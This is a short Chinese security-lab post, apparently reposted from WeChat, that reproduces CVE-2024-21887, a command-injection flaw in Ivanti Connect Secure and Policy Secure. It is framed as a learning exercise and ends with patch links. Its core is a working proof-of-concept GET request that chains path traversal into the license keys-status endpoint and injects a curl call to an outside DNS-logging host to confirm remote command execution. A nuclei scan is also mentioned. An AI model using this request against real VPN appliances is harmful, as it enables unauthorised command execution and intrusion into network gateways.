网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Ivаnti Cоnnесt Sесurе(9.х、22.х)和 Ivаnti Pоliсу Sесurе 的 Wеb 组件中存在一个命令注入漏洞,使得经过身份验证的管理员能够发送特别构建的请求并在设备上执行任意命令 。
Ivanti Connect Secure 9.x
Ivanti Connect Secure 22.x
1.访问漏洞环境
2.对漏洞进行复现
POC (GET)
漏洞复现
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20z5i19y.dnslog.cn HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36Connection: closeAccept-Encoding: gzip, deflate
测试DNSlog(漏洞存在)
3.nuclei工具测试(漏洞存在)
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/https://www.ivanti.com/products/connect-secure-vpn
原文始发于微信公众号(弥天安全实验室):【成功复现】Ivanti Connect Secure远程命令注入漏洞(CVE-2024-21887)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论